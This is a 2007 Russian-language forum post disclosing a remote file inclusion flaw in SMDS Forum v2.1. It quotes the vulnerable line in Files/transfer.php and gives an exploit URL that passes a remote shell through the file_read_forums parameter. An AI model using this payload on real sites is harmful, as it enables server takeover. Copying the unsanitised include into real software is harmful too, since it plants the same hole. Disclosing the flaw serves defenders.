SMDS Forum v.2.1 remote file inclusion

SMDS Forum v.2.1 remote file inclusion

01.09.2007, 17:58

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

С нами: 9989667

Репутация: 240

SMDS Forum v.2.1 remote file inclusion

Только что нашел удаленный инклуд в скриптах форума. Посмотреть описание форума и скачать сам движок можно здесь. Хотя форум и очень старый, но погуглив по теме:

Код:

SMDS Forum v.2.1 php inclusion

ничего не нашел.
Уязвимость присутствует в скрипте Files/transfer.php. В строке 13 код:

PHP код:


		
			
include $file_read_forums;

позволяет провести атаку на форум:

Код:

http://www.example.com/[FORUM_DIR]/Files/transfer.php?file_read_forums=[shell]

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось The_HuliGun; 01.09.2007 в 18:16..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Проблемы с Записью Cd-R

Nova

"Железо"

14.03.2009 17:59

Подскажите

Chrek625

Болталка

11.01.2007 21:46

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

Внести депозит

Депозит создан

Вывести депозит

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL